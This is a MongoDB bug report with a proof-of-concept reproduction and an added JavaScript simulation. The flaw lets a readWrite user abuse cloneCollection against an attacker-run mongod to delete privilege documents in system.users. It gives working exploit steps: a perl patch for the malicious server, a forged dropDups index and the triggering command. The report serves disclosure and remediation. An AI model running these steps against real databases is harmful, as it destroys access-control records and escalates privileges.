Core Server
SERVER-8942

readWrite users can delete privilege documents via cloneCollection

    • Type: Bug
    • Resolution: Done
    • Priority: Major - P3
    • Fix Version/s: 2.5.3
    • Affects Version/s: 2.4.0-rc2
    • Component/s: Security
    • Labels: None
    • Environment: ALL

      Running the command {cloneCollection:ns} creates indexes on ns, inserting one document for each result returned by the remote query db.system.indexes.find({ns:ns}). However, no input sanitization is performed to ensure that the returned index documents actually conform to the requested filter. A readWrite attacker can exploit this by pointing the command at a remote mongod under their control that returns forged results, in order to create arbitrary indexes of their choosing on the target database. The attacker can combine this with the secondary weakness described in SERVER-8802 (creating a dropDups system.users index) to delete privilege documents.

      The proposed fix is to sanitize the result of the db.system.indexes.find({ns:ns}) query, ensuring that doc.ns == ns holds for each item in the result set before it is inserted.

      Reproduce via:

      1. Instrument remote malicious mongod to replace every incoming query filter with {name: "exploit_1"}.

      # patch the malicious mongod so that every incoming query runs with the filter {name: "exploit_1"}
      perl -pi -e 's/^(        QueryMessage q\(d\);)$/$1 q.query = BSON\("name" << "exploit_1"\);/' src/mongo/db/instance.cpp
      scons mongod
      ./mongod
      

      2. Create index on remote malicious mongod

      db.system.users.ensureIndex({exploit:1}, {name:"exploit_1", unique:true, dropDups:true})
      

      3. Run cloneCollection on the victim mongod; the victim blindly inserts the index document above and consequently drops N-1 privilege documents from test.system.users

      db.adminCommand({cloneCollection:"test.collection", from:"malicious:27017"})
      
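      The index-copy step described above and the proposed doc.ns check, modelled as an added JavaScript example (not MongoDB server code, and not part of the original report). The remote index documents, the victim collection state and the helper names are constructed for illustration; the dropDups behaviour is modelled only as far as the report relies on it.

```javascript
// Added example (not MongoDB's code): models the cloneCollection index-copy step
// with and without the proposed "doc.ns == ns" check. All data is constructed.

// Constructed result set a malicious remote mongod might return for
// db.system.indexes.find({ns: "test.collection"}). The first document is
// honest; the second ignores the filter and targets the privilege collection.
const REMOTE_INDEX_DOCS = [
  { v: 1, key: { _id: 1 }, ns: "test.collection", name: "_id_" },
  { v: 1, key: { exploit: 1 }, ns: "test.system.users", name: "exploit_1",
    unique: true, dropDups: true },
];

// Constructed victim state: a "test" database with three privilege documents.
function makeVictim() {
  return {
    "test.collection": { docs: [{ _id: 1 }, { _id: 2 }], indexes: [] },
    "test.system.users": {
      docs: [{ _id: 1, user: "alice" }, { _id: 2, user: "bob" }, { _id: 3, user: "carol" }],
      indexes: [],
    },
  };
}

// What the victim does with a returned index document before the fix: it trusts
// doc.ns and builds the index there. A unique+dropDups index on a key that every
// document lacks keeps one document and drops the rest (the SERVER-8802 behaviour
// the report chains with), modelled here as a filter on the indexed key values.
function applyIndexDoc(victim, doc) {
  const coll = victim[doc.ns];
  if (!coll) return; // unknown namespace: nothing to index in this model
  coll.indexes.push(doc);
  if (doc.unique && doc.dropDups) {
    const seen = new Set();
    coll.docs = coll.docs.filter((d) => {
      const keyVal = JSON.stringify(Object.keys(doc.key).map((k) => d[k]));
      if (seen.has(keyVal)) return false; // duplicate key value: dropped
      seen.add(keyVal);
      return true;
    });
  }
}

// Proposed fix: keep only index documents whose ns is exactly the requested ns.
// Strict equality matters; a prefix or regex match would still let a remote
// return documents for a sibling namespace such as "test.system.users".
function sanitizeIndexDocs(requestedNs, remoteDocs) {
  return remoteDocs.filter((doc) => doc.ns === requestedNs);
}

// Simulate the index copy and report the resulting state of the victim.
function cloneIndexes(requestedNs, remoteDocs, sanitize) {
  const victim = makeVictim();
  const docs = sanitize ? sanitizeIndexDocs(requestedNs, remoteDocs) : remoteDocs;
  for (const doc of docs) applyIndexDoc(victim, doc);
  return {
    users: victim["test.system.users"].docs.length,
    userIndexes: victim["test.system.users"].indexes.map((i) => i.name),
    collectionIndexes: victim["test.collection"].indexes.map((i) => i.name),
  };
}

console.log("unsanitized:", cloneIndexes("test.collection", REMOTE_INDEX_DOCS, false));
console.log("sanitized:  ", cloneIndexes("test.collection", REMOTE_INDEX_DOCS, true));
```

      Without the check the forged document lands on test.system.users and two of the three privilege documents disappear; with the check only the _id_ index for test.collection survives the copy and system.users is untouched.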

            Assignee: Andy Schwerin (schwerin@mongodb.com)
            Reporter: J Rassi (rassi)
            Votes: 0
            Watchers: 4
